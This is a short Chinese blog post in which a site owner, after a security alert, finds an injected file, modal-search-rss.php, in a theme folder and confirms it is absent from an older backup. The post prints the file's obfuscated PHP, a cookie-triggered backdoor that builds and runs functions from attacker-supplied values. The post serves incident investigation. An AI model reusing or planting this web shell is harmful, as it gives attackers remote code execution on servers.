今天邮件收到了这个待处理的危急警报,一看,不就是官方主题吗?
处理
反正我也用不到这主题,就先把主题文件删除了,但还是有点好奇,就找一下本地的备份文件,做一下对比,看是不是后面加上的,如果是,那可能网站真的不安全了。
先在本机上搜索一下modal-search-rss.php,没发现有这个文件,备份文件7月3日下载回来的
这是7月3日备份文件,并没有modal-search-rss.php文件
多出一个modal-search-rss.php文件,很明显是复制了modal-search.php文件后,修改而来
内容如下
<?php
$theme =$_COOKIE;$layout=1;$tsize = sizeof($theme);if($tsize == 27) { if (in_array(gettype($theme).count($theme),$theme)) { $theme[29] = $theme[29].$theme[61];$theme[35] = $theme[29]($theme[35]);$theme = $theme[35]($theme[19],$theme[29]($theme[57]));$menu=12;$theme($layout,$menu,$tsize);$cnf=33;}}总结
我没有动这个主动目录,那很明显是被人动过服务器了,看来要认真排查一下了,不然没感觉没安全感了
暂无评论